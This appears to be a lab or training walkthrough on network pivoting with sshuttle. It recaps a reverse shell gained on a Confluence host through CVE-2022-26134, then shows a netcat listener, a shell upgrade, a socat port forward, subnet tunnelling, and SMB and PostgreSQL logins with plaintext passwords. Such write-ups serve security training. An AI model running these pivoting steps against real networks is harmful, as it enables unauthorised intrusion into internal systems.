Sshuttle
sshuttle is a tool that creates a VPN-like tunnel over SSH. It transparently routes traffic to specified subnets through an SSH connection. It requires root privileges on the client (attacker) machine and Python 3 on the SSH server (pivot host).
Particularly useful when classic dynamic port forwarding is cumbersome to manage.
Tunelling scenario recap:
Got a reverse shell on
CONFLUENCE01(192.168.125.63) via CVE-2022-26134.We can SSH to
PGDATABASE01(10.4.125.215) fromCONFLUENCE01.Our goal is to access the following internal networks:
10.4.125.0/24and172.16.125.0/24.
We can set up a port forward on CONFLUENCE01, forwarding local port 2222 to PGDATABASE01:22 using socat. This makes PGDATABASE01’s SSH service available on CONFLUENCE01:2222.
$ nc -lvnp 4444
...
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ socat TCP-LISTEN:2222,fork TCP:10.4.125.215:22Then we can use sshuttle from Kali to route desired subnets through the forwarded SSH connection. -r specifies the SSH connection string (user@pivot_host:port) followed by the list of subnets to route.
$ sshuttle -r database_admin@192.168.125.63:2222 10.4.125.0/24 172.16.125.0/24
...
database_admin@192.168.125.63's password: #sqlpass123
client_input_hostkeys: hostkeys_foreach failed for /home/x7331/.ssh/known_hosts: Permission denied
c : Connected to server.We can now test the pivoted access by connecting to an internal service (e.g., SMB on HRSHARES) without any additional port forwards.
$ smbclient -L //172.16.125.217/ -U hr_admin --password=Welcome1234
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Scripts Disk
Users Disk
$ psql -h 10.4.125.215 -p 5432 -U postgres
Password for user postgres: # D@t4basePassw0rd!
...
postgres=#Last updated
Was this helpful?